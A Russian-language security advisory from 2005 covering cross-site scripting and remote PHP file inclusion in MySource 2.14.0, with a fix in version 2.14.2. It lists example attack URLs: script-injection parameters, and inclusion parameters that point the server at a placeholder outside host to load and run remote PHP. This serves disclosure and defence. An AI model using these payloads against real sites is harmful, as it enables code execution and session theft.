Security Lab

Межсайтовый скриптинг и PHP-инклюдинг в MySource

Дата публикации:20.10.2005
Всего просмотров:1480
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: MySource 2.14.0

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей и выполнить произвольный PHP сценарий на целевой системе.

1. Межсайтовый скриптинг возможет из-за недостаточной обработки входных данных перед отображением их в браузере пользователей. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:

http://[victim]/web/edit/upgrade_in_progress_backend.php?target_url=">[code]
http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/header.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php?bgcolor=</style>[code]
http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php?stylesheet=">[code]

2. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе. Примеры:

http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php?SQUIZLIB_PATH=http://[host]/[file]?
http://[victim]/web/init_mysource.php?INCLUDE_PATH=http://[host]/[file]?
http://[victim]/pear/Net_Socket/Socket.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/HTTP_Request/Request.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail/Mail.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Date/Date/Span.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mimeDecode.php?PEAR_PATH=http://[host]/[file]?
http://[victim]/pear/Mail_Mime/mime.php?PEAR_PATH=http://[host]/[file]?

Для удачной эксплуатации уязвимостей должна быть включена опция register_globals

URL производителя: mysource.squiz.net

Решение: Установите последнюю версию (2.14.2) с сайта производителя.
http://mysource.squiz.net/download/downloads/download_2.14.2

Источник:

Ссылки: MySource Cross-Site Scripting and File Inclusion Vulnerabilities